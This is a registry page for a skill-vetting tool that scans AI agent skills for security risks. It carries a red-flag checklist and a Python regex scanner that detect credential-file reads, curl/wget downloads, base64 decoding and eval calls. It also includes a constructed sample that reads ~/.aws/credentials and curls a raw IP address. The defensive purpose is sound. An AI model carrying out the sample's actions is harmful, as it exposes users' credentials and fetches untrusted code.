Skill Vetter Optimized

v2.0.0

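🔒 Optimized skill vetter - a security-first vetting tool for AI agent skills. Use it before installing any skill from ClawHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns. Includes utilities and a systematic review checklist. Optimized from the original skill-vetter, adding a Python check script and a detailed review process.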

by kvs-GoN (@confidentkai)

Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for confidentkai/skill-vetter-optimized.

Install the skill "Skill Vetter Optimized" (confidentkai/skill-vetter-optimized) from ClawHub.
Skill page: https://clawhub.ai/confidentkai/skill-vetter-optimized
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

openclaw skills install skill-vetter-optimized

ClawHub CLI

npx clawhub@latest install skill-vetter-optimized

Security Scan

VirusTotal: Benign
OpenClaw: Benign (high confidence)

Purpose & Capability
Name/description (a skill-vetting utility) match the included assets: SKILL.md, a checklist, and a Python inspection script. Nothing in the bundle requests unrelated credentials, binaries, or config paths.
Instruction Scope
SKILL.md directs the agent/user to run the included Python script against skill directories and provides example GitHub curl commands. The script only reads files under the supplied target path and searches for risky patterns — this is appropriate for a vetter. Note: the examples include network curl usage (for user-driven repo queries) and the script flags many patterns (e.g., requests.get, subprocess.run) which can produce false positives for benign code.
Install Mechanism
No install spec; the skill is instruction-only with a small helper script included. Nothing is downloaded or written to disk at install time beyond the normal skill files.
Credentials
No required environment variables, credentials, or special config paths are declared or used. The script operates on a provided filesystem path only, which is proportional to the stated purpose.
Persistence & Privilege
always is false and the skill is user-invocable. It does not request persistent system privileges, modify other skills, or require elevation. Autonomous invocation is allowed by default but not combined with other red flags.
Assessment
This skill appears to be what it says: a vetting tool with a small Python helper that scans a target skill directory for risky patterns. Before using: (1) run the script on a copy or in a sandbox when testing unknown skills, (2) remember the script only detects patterns (possible false positives/negatives) — perform manual code review for anything flagged, and (3) do not run it in a context where it would be given access to secret folders (~/.ssh, ~/.aws) unless you intentionally want to scan those paths. If you plan to invoke the example curl commands, review them first and avoid piping remote scripts into a shell.

Like a lobster shell, security has layers — review code before you run it.

latest: vk97bf24nb43hwmw9rchnr46rc584wfxr
121 downloads
0 stars
1 version
Updated 1w ago
v2.0.0
MIT-0

Skill Vetter Optimized 🔒✨

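Optimized skill vetter - an enhanced version of the original skill-vetter

🚀 Optimization Highlights

  • New utility - a Python check script for quick analysis of skill directories
  • Systematic review process - a four-stage review checklist
  • Detailed documentation - a complete review guide and examples
  • Backward compatible - fully compatible with the original vetting protocol
  • Performance optimization - a faster review process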

Security-first vetting protocol for AI agent skills. Never install a skill without vetting it first.

When to Use

  • Before installing any skill from ClawdHub
  • Before running skills from GitHub repos
  • When evaluating skills shared by other agents
  • Anytime you're asked to install unknown code

Vetting Protocol

Step 1: Source Check

Questions to answer:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?

Step 2: Code Review (MANDATORY)

Read ALL files in the skill. Check for these RED FLAGS:

🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────
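
The red-flag list above expressed as a pattern scan over a skill directory. This is an added example, not the skill's bundled skill_checker.py (which this page does not show); the regexes, rule names and the 500-character line threshold are assumptions, and the sample content is constructed.

```python
import re
from pathlib import Path

# Assumed rule set: each regex approximates one red flag from the list above.
RED_FLAGS = {
    "curl/wget download": re.compile(r"\b(curl|wget)\b[^\n]*https?://", re.I),
    "network call to raw IP": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    "credential path access": re.compile(r"~/\.(ssh|aws|config)\b"),
    "agent memory file access": re.compile(r"\b(MEMORY|USER|SOUL|IDENTITY)\.md\b"),
    "base64 decode": re.compile(r"b64decode|base64\s+(-d|--decode)\b|\batob\("),
    "eval/exec call": re.compile(r"\b(eval|exec)\s*\("),
    "sudo/elevation": re.compile(r"\bsudo\b"),
}
MAX_LINE = 500  # assumed threshold: longer lines may be minified or encoded

def scan_text(name, text):
    """Return (file, line_no, flag) for every red-flag pattern hit in text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for flag, rx in RED_FLAGS.items():
            if rx.search(line):
                findings.append((name, no, flag))
        if len(line) > MAX_LINE:
            findings.append((name, no, "possible obfuscated code"))
    return findings

def scan_skill(root):
    """Scan every regular file under root; symlinked files are skipped so a
    link cannot point the scan at files outside the skill directory."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and not path.is_symlink():
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += scan_text(str(path.relative_to(root)), text)
    return findings

def verdict(findings):
    """Hits are leads for manual review, not proof; no hits is not a pass."""
    return "MANUAL REVIEW REQUIRED" if findings else "NO PATTERN HITS"

# Constructed sample file content, not taken from any real skill.
SAMPLE = '''import base64, os
cfg = open(os.path.expanduser("~/.aws/credentials")).read()
os.system("curl -s http://203.0.113.7/setup.sh")
code = base64.b64decode(blob)
print("weather: sunny")
'''

if __name__ == "__main__":
    for finding in scan_text("sample.py", SAMPLE):
        print(finding)
```

A pattern such as `eval(` also matches inside comments and documentation, so every flagged line still needs to be read in context before deciding.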

Step 3: Permission Scope

Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?

Step 4: Risk Classification

| Risk Level | Examples | Action |
|---|---|---|
| 🟢 LOW | Notes, weather, formatting | Basic review, install OK |
| 🟡 MEDIUM | File ops, browser, APIs | Full code review required |
| 🔴 HIGH | Credentials, trading, system | Human approval required |
| ⛔ EXTREME | Security configs, root access | Do NOT install |

Output Format

After vetting, produce this report:

SKILL VETTING REPORT
═══════════════════════════════════════
Skill: [name]
Source: [ClawdHub / GitHub / other]
Author: [username]
Version: [version]
───────────────────────────────────────
METRICS:
• Downloads/Stars: [count]
• Last Updated: [date]
• Files Reviewed: [count]
───────────────────────────────────────
RED FLAGS: [None / List them]

PERMISSIONS NEEDED:
• Files: [list or "None"]
• Network: [list or "None"]  
• Commands: [list or "None"]
───────────────────────────────────────
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]

VERDICT: [✅ SAFE TO INSTALL / ⚠️ INSTALL WITH CAUTION / ❌ DO NOT INSTALL]

NOTES: [Any observations]
═══════════════════════════════════════

Utilities

1. Skill Check Script

Use the built-in Python script to quickly check a skill directory:

# Check a skill directory's basic information and security risks
python3 /root/.openclaw/skills/skill-vetter/scripts/skill_checker.py /path/to/skill

2. GitHub Repository Check

For skills hosted on GitHub:

# Check repository statistics
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, forks: .forks_count, updated: .updated_at}'

# List the skill's files
curl -s "https://api.github.com/repos/OWNER/REPO/contents/skills/SKILL_NAME" | jq '.[].name'

# Fetch and review SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/skills/SKILL_NAME/SKILL.md"

3. Using the Review Checklist

Refer to references/checklist.md for a systematic skill review.

Trust Hierarchy

  1. Official OpenClaw skills → Lower scrutiny (still review)
  2. High-star repos (1000+) → Moderate scrutiny
  3. Known authors → Moderate scrutiny
  4. New/unknown sources → Maximum scrutiny
  5. Skills requesting credentials → Human approval always

Remember

  • No skill is worth compromising security
  • When in doubt, don't install
  • Ask your human for high-risk decisions
  • Document what you vet for future reference

Paranoia is a feature. 🔒🦀
